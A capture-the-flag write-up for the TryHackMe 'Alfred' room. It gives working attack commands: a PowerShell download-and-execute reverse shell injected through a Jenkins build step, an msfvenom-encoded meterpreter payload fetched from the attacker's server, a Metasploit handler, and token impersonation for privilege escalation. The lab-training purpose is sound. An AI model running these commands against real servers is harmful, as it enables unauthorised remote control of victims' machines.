TryHackMe: Alfred Write-up

Check out Alfred room on TryHackMe

Original Publish Date: Sep 29, 2022

1 — Initial Access

Starting our enumeration with nmap like this command:

nmap -A -Pn -vv -T5 -p- 10.10.81.101 | tee -a nmap_results.txt

Flags that I’m using:

For aggressive scanning (version & OS) -A

Because machine does not respond to ping -Pn

Increase verbosity -vv

Set timing to fastest -T5

Scan all ports -p-

And I’m saving nmap results to a file in case I need them again.

Nmap results

1.1 — How many ports are open? (TCP only)

We can see it’s 3.

1.2 — What is the username and password for the log in panel

Well, you can kinda guess :) They’re one of the most common ones.

1.3 — What is the user.txt flag?

First, we need to start our python server for file transfer like:

python3 -m http.server

Then we need to listen for connection

nc -lnvp 4444

Finally, we need to actually download reverse shell script from GitHub

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Optionally, verify you can actually reach the script

Navigate to Dashboard > Project > Configure

Go to Build > Command and put this as recommended in the room according to attacker IP (assuming you didn’t change python server port)

powershell iex (New-Object Net.WebClient).DownloadString('http://<IP_ADDRESS>:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP_ADDRESS> -Port 4444

Save and go to the dashboard again. Hit build.

Build button location

We got our connection

Now we can get user.txt

2 — Switching Shells

Use msfvenom to create the a windows meterpreter reverse shell using the following payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder        x86/shikata_ga_nai LHOST=[IP] LPORT=5555 -f exe -o payload.exe

Msfvenom output

After creating this payload, download it to the machine using the same method in the previous step:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<IP_ADDRESS>:8000/payload.exe','payload.exe')"

Fire up msfconsole and set up handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run

Msfconsole settings

And run payload on the machine

powershell start-process "payload.exe"

We got our meterpreter shell :)

2.1 — What is the final size of the exe payload that you generated?

You can see it from msfvenom output (just below the second part’s beginning).

3 — Privilege Escalation

Let’s use the incognito module that will allow us to exploit this vulnerability. On meterpreter shell type:

load incognito

Then we can use admin tokens like this:

impersonate_token "BUILTIN\Administrators"

Successful escalation

3.1 — What is the output when you run the getuid command?

You can see the output above.

3.2 — Read the root.txt file at C:\Windows\System32\config

First type ps and find services.exe.

Copy the PID then type:

migrate <PID>

Migration completed

And we can read root.txt

Done!

And that was pretty much it.

Thank you for reading!